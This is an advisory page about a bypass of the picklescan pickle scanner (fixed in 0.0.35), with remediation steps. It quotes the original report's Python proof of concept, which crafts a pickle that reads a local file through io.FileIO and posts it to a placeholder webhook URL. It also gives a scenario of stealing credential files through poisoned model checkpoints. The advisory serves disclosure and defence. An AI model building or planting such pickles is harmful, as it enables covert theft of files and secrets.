AI Threat Alert
picklescan is used as a security gate in ML pipelines to validate pickle files before loading — this vulnerability means that gate is bypassable, giving your team false confidence that pickle files are clean. Attackers can craft malicious pickles that exfiltrate `/etc/passwd` and other sensitive files via SSRF without triggering RCE-focused blocklists. Upgrade picklescan to 0.0.35 immediately and audit any pickle files scanned by earlier versions as potentially untrusted.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| picklescan | pip | < 0.0.35 | 0.0.35 |
Do you use picklescan? You're affected.
Severity & Risk
Recommended Action
- 1. PATCH: Upgrade picklescan to >= 0.0.35 immediately across all environments (pip install --upgrade picklescan). 2. AUDIT: Treat all pickle files scanned by picklescan < 0.0.35 as unverified; re-scan with the patched version or reload from trusted sources. 3. MIGRATE: Prefer safer serialization formats — safetensors for model weights, Parquet/Arrow for datasets — that eliminate pickle deserialization risk entirely. 4. NETWORK CONTROLS: Enforce egress filtering on model-loading workers to block unexpected outbound HTTP/HTTPS, which would mitigate the SSRF exfiltration leg even if a malicious pickle executes. 5. DETECT: Alert on outbound HTTP connections from processes performing model loading. Monitor for `io.FileIO` or `urllib.request` patterns in pickle scanning logs if running custom detection.
Classification
Compliance Impact
This CVE is relevant to:
Technical Details
NVD Description
### Summary Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server. ### Details The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features: 1. io.FileIO: Opens local files without using builtins.open. 2. urllib.request.urlopen: Accepts the file object as an iterable body for a POST request. 3. Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling. ### PoC ```python import pickle, io, urllib.request class GetFile: def __reduce__(self): return (io.FileIO, ('/etc/hosts', 'r')) class Exfiltrate: def __reduce__(self): return (urllib.request.urlopen, ('https://webhook.site/YOUR_UUID_HERE', GetFile())) with open("bypass_http.pkl", "wb") as f: pickle.dump(Exfiltrate(), f) ``` <img width="650" height="114" alt="Screenshot 2025-12-30 at 10 13 14 PM" src="https://github.com/user-attachments/assets/4edf9640-80f6-4701-ae87-cff1079e2994" /> ### Impact - Arbitrary file read Thanks for this library and your time. If you think `picklescan` is focused on detecting only `RCE` kind of vulnerabilities rather adding `File IO`, `Http` or any protocol based may cause lot of noise, feel free to close this issue.
Exploitation Scenario
An adversary targets an organization's model hub or shared ML artifact repository. They upload a poisoned model checkpoint serialized as a malicious pickle using the PoC technique — chaining `io.FileIO('/etc/passwd', 'r')` as the body of a `urllib.request.urlopen` POST to an attacker-controlled webhook. The organization's CI/CD pipeline runs picklescan (< 0.0.35) on incoming artifacts; the file passes as clean because it contains no `os.system`, `exec`, or other RCE-pattern opcodes. A downstream data scientist or automated pipeline loads the checkpoint into a training job. At deserialization, the server streams its `/etc/passwd` — or more critically, cloud credential files like `~/.aws/credentials` or mounted secrets — directly to the attacker's server, all before any model code executes.